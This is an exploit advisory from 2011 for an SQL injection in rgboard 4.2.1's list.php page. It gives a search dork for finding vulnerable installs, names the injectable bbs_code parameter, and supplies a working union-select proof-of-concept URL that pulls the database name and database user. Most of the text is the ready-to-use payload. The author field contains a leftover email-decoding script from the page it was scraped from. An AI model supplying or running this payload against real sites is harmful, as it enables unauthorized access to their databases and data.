* Exploit Title: rgboard SQL Injection Vulnerability * inurl: rgboard4/list.php * Date: 2011. 6.22 * Author: hamt0ry (hamt0ry@163.com<script type="text/javascript"> /* <![CDATA[ */ (function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})(); /* ]]> */ </script>) * Test on : Windowss XP SP3 * Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down * Version: rgboard 4.2.1 * SQL Injection http://[target]/list.php?bbs_code=notice[SQL] * POC : http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23